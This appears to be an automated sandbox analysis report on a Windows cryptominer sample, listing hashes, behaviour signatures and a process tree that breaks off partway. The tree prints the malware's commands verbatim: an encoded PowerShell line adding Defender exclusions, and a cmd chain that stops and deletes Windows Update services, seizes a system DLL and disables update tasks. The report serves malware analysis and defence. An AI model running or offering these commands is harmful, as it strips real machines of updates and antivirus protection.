Analysis
-
max time kernel
315s -
max time network
318s -
platform
windows10-1703_x64 -
resource
win10-20220718-en -
resource tags
arch:x64arch:x86image:win10-20220718-enlocale:en-usos:windows10-1703-x64system -
submitted
02-08-2022 22:19
Behavioral task
behavioral1
Sample
b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe
Resource
win7-20220718-en
General
-
Target
b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe
-
Size
7.2MB
-
MD5
39a2104f5c1096d1c9481cbf5203a820
-
SHA1
17b15f09ef79c1cfc0b8ae2c52fd0e564b00aa34
-
SHA256
b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc
-
SHA512
7b22e01e8b271c17e9c1480802bf111c502b3b18894b9e6dbf42e011809cb1f8f965e454f78c7bd14561733c7ab2b831a08a962ba375fc19048184350d18bf52
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/3256-464-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3256-465-0x000000014036EAC4-mapping.dmp xmrig behavioral2/memory/3256-466-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3256-467-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3256-478-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3256-483-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 492 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 3996 takeown.exe 3760 icacls.exe 3720 takeown.exe 4084 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 3996 takeown.exe 3760 icacls.exe 3720 takeown.exe 4084 icacls.exe -
Processes:
resource yara_rule behavioral2/memory/3896-114-0x0000000000400000-0x00000000010B6000-memory.dmp themida behavioral2/memory/3896-116-0x0000000000400000-0x00000000010B6000-memory.dmp themida behavioral2/memory/3896-117-0x0000000000400000-0x00000000010B6000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral2/memory/492-268-0x0000000000400000-0x00000000010B6000-memory.dmp themida behavioral2/memory/492-269-0x0000000000400000-0x00000000010B6000-memory.dmp themida behavioral2/memory/492-271-0x0000000000400000-0x00000000010B6000-memory.dmp themida -
Processes:
b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.EXEpowershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exeupdater.exepid process 3896 b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe 492 updater.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 3948 set thread context of 3256 3948 conhost.exe explorer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe powershell.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe powershell.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1620 sc.exe 1272 sc.exe 200 sc.exe 2560 sc.exe 3788 sc.exe 2796 sc.exe 1184 sc.exe 2216 sc.exe 3760 sc.exe 208 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.EXEconhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 3608 reg.exe 420 reg.exe 2952 reg.exe 2800 reg.exe 1892 reg.exe 1892 reg.exe 876 reg.exe 1968 reg.exe 3520 reg.exe 2688 reg.exe 2700 reg.exe 1536 reg.exe 496 reg.exe 4048 reg.exe 2560 reg.exe 60 reg.exe 3628 reg.exe 3116 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.exepowershell.EXEpowershell.execonhost.exeexplorer.exepid process 708 powershell.exe 708 powershell.exe 708 powershell.exe 2144 conhost.exe 3864 powershell.exe 3864 powershell.exe 3864 powershell.exe 1768 powershell.EXE 1768 powershell.EXE 1768 powershell.EXE 2148 powershell.exe 2148 powershell.exe 2148 powershell.exe 3948 conhost.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe 3256 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 608 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 708 powershell.exe Token: SeIncreaseQuotaPrivilege 708 powershell.exe Token: SeSecurityPrivilege 708 powershell.exe Token: SeTakeOwnershipPrivilege 708 powershell.exe Token: SeLoadDriverPrivilege 708 powershell.exe Token: SeSystemProfilePrivilege 708 powershell.exe Token: SeSystemtimePrivilege 708 powershell.exe Token: SeProfSingleProcessPrivilege 708 powershell.exe Token: SeIncBasePriorityPrivilege 708 powershell.exe Token: SeCreatePagefilePrivilege 708 powershell.exe Token: SeBackupPrivilege 708 powershell.exe Token: SeRestorePrivilege 708 powershell.exe Token: SeShutdownPrivilege 708 powershell.exe Token: SeDebugPrivilege 708 powershell.exe Token: SeSystemEnvironmentPrivilege 708 powershell.exe Token: SeRemoteShutdownPrivilege 708 powershell.exe Token: SeUndockPrivilege 708 powershell.exe Token: SeManageVolumePrivilege 708 powershell.exe Token: 33 708 powershell.exe Token: 34 708 powershell.exe Token: 35 708 powershell.exe Token: 36 708 powershell.exe Token: SeShutdownPrivilege 164 powercfg.exe Token: SeCreatePagefilePrivilege 164 powercfg.exe Token: SeShutdownPrivilege 2136 powercfg.exe Token: SeCreatePagefilePrivilege 2136 powercfg.exe Token: SeDebugPrivilege 2144 conhost.exe Token: SeShutdownPrivilege 3004 powercfg.exe Token: SeCreatePagefilePrivilege 3004 powercfg.exe Token: SeShutdownPrivilege 1916 powercfg.exe Token: SeCreatePagefilePrivilege 1916 powercfg.exe Token: SeTakeOwnershipPrivilege 3996 takeown.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeIncreaseQuotaPrivilege 3864 powershell.exe Token: SeSecurityPrivilege 3864 powershell.exe Token: SeTakeOwnershipPrivilege 3864 powershell.exe Token: SeLoadDriverPrivilege 3864 powershell.exe Token: SeSystemProfilePrivilege 3864 powershell.exe Token: SeSystemtimePrivilege 3864 powershell.exe Token: SeProfSingleProcessPrivilege 3864 powershell.exe Token: SeIncBasePriorityPrivilege 3864 powershell.exe Token: SeCreatePagefilePrivilege 3864 powershell.exe Token: SeBackupPrivilege 3864 powershell.exe Token: SeRestorePrivilege 3864 powershell.exe Token: SeShutdownPrivilege 3864 powershell.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeSystemEnvironmentPrivilege 3864 powershell.exe Token: SeRemoteShutdownPrivilege 3864 powershell.exe Token: SeUndockPrivilege 3864 powershell.exe Token: SeManageVolumePrivilege 3864 powershell.exe Token: 33 3864 powershell.exe Token: 34 3864 powershell.exe Token: 35 3864 powershell.exe Token: 36 3864 powershell.exe Token: SeIncreaseQuotaPrivilege 3864 powershell.exe Token: SeSecurityPrivilege 3864 powershell.exe Token: SeTakeOwnershipPrivilege 3864 powershell.exe Token: SeLoadDriverPrivilege 3864 powershell.exe Token: SeSystemProfilePrivilege 3864 powershell.exe Token: SeSystemtimePrivilege 3864 powershell.exe Token: SeProfSingleProcessPrivilege 3864 powershell.exe Token: SeIncBasePriorityPrivilege 3864 powershell.exe Token: SeCreatePagefilePrivilege 3864 powershell.exe Token: SeBackupPrivilege 3864 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.execonhost.execmd.execmd.exedescription pid process target process PID 3896 wrote to memory of 2144 3896 b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe conhost.exe PID 3896 wrote to memory of 2144 3896 b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe conhost.exe PID 3896 wrote to memory of 2144 3896 b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe conhost.exe PID 2144 wrote to memory of 708 2144 conhost.exe powershell.exe PID 2144 wrote to memory of 708 2144 conhost.exe powershell.exe PID 2144 wrote to memory of 2428 2144 conhost.exe cmd.exe PID 2144 wrote to memory of 2428 2144 conhost.exe cmd.exe PID 2144 wrote to memory of 1384 2144 conhost.exe cmd.exe PID 2144 wrote to memory of 1384 2144 conhost.exe cmd.exe PID 2428 wrote to memory of 200 2428 cmd.exe sc.exe PID 2428 wrote to memory of 200 2428 cmd.exe sc.exe PID 1384 wrote to memory of 164 1384 cmd.exe powercfg.exe PID 1384 wrote to memory of 164 1384 cmd.exe powercfg.exe PID 1384 wrote to memory of 2136 1384 cmd.exe powercfg.exe PID 1384 wrote to memory of 2136 1384 cmd.exe powercfg.exe PID 2428 wrote to memory of 2560 2428 cmd.exe sc.exe PID 2428 wrote to memory of 2560 2428 cmd.exe sc.exe PID 1384 wrote to memory of 3004 1384 cmd.exe powercfg.exe PID 1384 wrote to memory of 3004 1384 cmd.exe powercfg.exe PID 2428 wrote to memory of 2216 2428 cmd.exe sc.exe PID 2428 wrote to memory of 2216 2428 cmd.exe sc.exe PID 1384 wrote to memory of 1916 1384 cmd.exe powercfg.exe PID 1384 wrote to memory of 1916 1384 cmd.exe powercfg.exe PID 2428 wrote to memory of 3788 2428 cmd.exe sc.exe PID 2428 wrote to memory of 3788 2428 cmd.exe sc.exe PID 2428 wrote to memory of 2796 2428 cmd.exe sc.exe PID 2428 wrote to memory of 2796 2428 cmd.exe sc.exe PID 2428 wrote to memory of 1892 2428 cmd.exe reg.exe PID 2428 wrote to memory of 1892 2428 cmd.exe reg.exe PID 2428 wrote to memory of 3520 2428 cmd.exe reg.exe PID 2428 wrote to memory of 3520 2428 cmd.exe reg.exe PID 2428 wrote to memory of 876 2428 cmd.exe reg.exe PID 2428 wrote to memory of 876 2428 cmd.exe reg.exe PID 2428 wrote to memory of 496 2428 cmd.exe reg.exe PID 2428 wrote to memory of 496 2428 cmd.exe reg.exe PID 2428 wrote to memory of 1968 2428 cmd.exe reg.exe PID 2428 wrote to memory of 1968 2428 cmd.exe reg.exe PID 2428 wrote to memory of 3996 2428 cmd.exe takeown.exe PID 2428 wrote to memory of 3996 2428 cmd.exe takeown.exe PID 2428 wrote to memory of 3760 2428 cmd.exe icacls.exe PID 2428 wrote to memory of 3760 2428 cmd.exe icacls.exe PID 2144 wrote to memory of 3864 2144 conhost.exe powershell.exe PID 2144 wrote to memory of 3864 2144 conhost.exe powershell.exe PID 2428 wrote to memory of 3608 2428 cmd.exe reg.exe PID 2428 wrote to memory of 3608 2428 cmd.exe reg.exe PID 2428 wrote to memory of 420 2428 cmd.exe reg.exe PID 2428 wrote to memory of 420 2428 cmd.exe reg.exe PID 2428 wrote to memory of 4048 2428 cmd.exe reg.exe PID 2428 wrote to memory of 4048 2428 cmd.exe reg.exe PID 2428 wrote to memory of 60 2428 cmd.exe reg.exe PID 2428 wrote to memory of 60 2428 cmd.exe reg.exe PID 2428 wrote to memory of 1620 2428 cmd.exe schtasks.exe PID 2428 wrote to memory of 1620 2428 cmd.exe schtasks.exe PID 2428 wrote to memory of 4040 2428 cmd.exe schtasks.exe PID 2428 wrote to memory of 4040 2428 cmd.exe schtasks.exe PID 2428 wrote to memory of 3744 2428 cmd.exe schtasks.exe PID 2428 wrote to memory of 3744 2428 cmd.exe schtasks.exe PID 2428 wrote to memory of 1416 2428 cmd.exe schtasks.exe PID 2428 wrote to memory of 1416 2428 cmd.exe schtasks.exe PID 2428 wrote to memory of 2212 2428 cmd.exe schtasks.exe PID 2428 wrote to memory of 2212 2428 cmd.exe schtasks.exe PID 2428 wrote to memory of 2204 2428 cmd.exe schtasks.exe PID 2428 wrote to memory of 2204 2428 cmd.exe schtasks.exe PID 2428 wrote to memory of 2136 2428 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe"C:\Users\Admin\AppData\Local\Temp\b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe"2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbAB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGkAeQBuACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
